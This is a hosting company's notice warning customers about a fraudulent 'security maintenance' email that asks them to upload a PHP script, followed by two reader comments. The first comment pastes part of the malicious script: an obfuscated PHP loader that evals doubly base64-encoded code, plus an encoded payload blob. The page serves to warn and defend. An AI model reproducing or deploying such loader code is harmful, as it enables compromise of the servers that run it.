Fraudulent Email

It has come to our attention that a handful of hosting customers recently received a fraudulent email message claiming to be from CWS. The subject line of this message is “Hosting Regular Security Maintenance.”

The message includes an attached PHP script named webguard.php with instructions for the hosting customer to place the script on his or her website and run it. Although this file is presented as a security feature, the opposite is in fact true. The script is malicious and is intended to compromise the security of a server on which it runs.

Should you receive an email of this nature, do not under any circumstances upload the script to your website. If you ever receive an email that claims to be from CWS and have any question at all about its authenticity, please contact us at 1-888-426-7793.

2 responses

  1. this is what i received from a client asking if it was true.

    I opened it in textpad and it looks really fishy…

    Here is a portion of the file (now deleted)

    < ? p h p // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
    $OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=129812;urldecode(eval((base64_decode(base64_decode(‘SkU4d01EQlBNRTh3TUQxbWIzQmxiaWdrVDA5UE1FOHdUekF3TENkeVlpY3BPM2RvYVd4bEtDMHRKRTh3TUU4d01FOHdNQ2xtWjJWMGN5Z2tUekF3TUU4d1R6QXdMREV3TWpRcE8yWm5aWFJ6S0NSUE1EQXdUekJQTURBc05EQTVOaWs3SkU5UE1EQlBNREJQTUQwb1ltRnpaVFkwWDJSbFkyOWtaU2h6ZEhKMGNpaG1jbVZoWkNna1R6QXdNRTh3VHpBd0xETTNNaWtzSnpFeU16UTFOamM0T1RCQllVSmlRMk5FWkVWbFJtWkhaMGhvU1dsS2FrdHJUR3hOYlU1dVQyOVFjRkZ4VW5KVGMxUjBWWFZXZGxkM1dIaFplVnA2S3k4OUp5d25RVUpEUkVWR1IwaEpTa3RNVFU1UFVGRlNVMVJWVmxkWVdWcGhZbU5rWldabmFHbHFhMnh0Ym05d2NYSnpkSFYyZDNoNWVqQXhNak0wTlRZM09Ea3JMeWNwS1NrN1pYWmhiQ2drVDA4d01FOHdNRTh3S1RzPQ==’)))));return;?>
    05zcB42cB42cB4vnJOfogw0nJ7tlHWFP0vzkdNnBdfzk0UTM0U9S05zceu2cB5ZTB3XM0U9RA70lJWFWb6zNhGbsh7FPJwdUj89Pho0nHGDP05ZTB42cB5ZTB3TNeVZTB5ZTB41TAEToBe9ub4FWbuLxB56lDO04HVdNdGf7hNjoE7l0IFpQEWrBi5vreOxciv2TFg6EJnbuf8dfjfhWfwjHK6nxGoPqauVoa3

  2. had a look a similar email claiming to be from snapnames.com. I is very obfuscated but turns out to be a tool for getting lots of server info and doing various bad things from php. It notified a gmail account when ran too.

Comments are closed.